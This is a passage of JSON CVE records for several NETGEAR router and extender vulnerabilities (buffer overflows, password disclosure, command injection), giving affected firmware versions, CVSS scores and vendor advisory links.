WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-11059",
"datePublished": "2020-04-28T16:20:22",
"dateReserved": "2020-04-27T00:00:00",
"dateUpdated": "2024-08-06T03:47:34.858Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-35787
Vulnerability from cvelistv5
Published
2020-12-29 23:40
Modified
2024-08-04 17:09
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T17:09:15.193Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:H/I:H/PR:L/S:U/UI:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-12-29T23:40:23",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-35787",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:H/I:H/PR:L/S:U/UI:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379",
"refsource": "MISC",
"url": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-35787",
"datePublished": "2020-12-29T23:40:23",
"dateReserved": "2020-12-29T00:00:00",
"dateUpdated": "2024-08-04T17:09:15.193Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18777
Vulnerability from cvelistv5
Published
2020-04-22 14:42
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.049Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T14:42:10",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18777",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18777",
"datePublished": "2020-04-22T14:42:10",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.049Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20733
Vulnerability from cvelistv5
Published
2020-04-16 19:12
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.918Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T19:12:04",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20733",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20733",
"datePublished": "2020-04-16T19:12:04",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.918Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-38519
Vulnerability from cvelistv5
Published
2021-08-11 00:02
Modified
2024-08-04 01:44
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T01:44:22.935Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000063762/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0564"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-08-11T00:02:38",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000063762/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0564"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-38519",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000063762/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0564",
"refsource": "MISC",
"url": "https://kb.netgear.com/000063762/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0564"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-38519",
"datePublished": "2021-08-11T00:02:38",
"dateReserved": "2021-08-10T00:00:00",
"dateUpdated": "2024-08-04T01:44:22.935Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20731
Vulnerability from cvelistv5
Published
2020-04-16 19:10
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.796Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T19:10:35",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061196/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2254"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20731",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
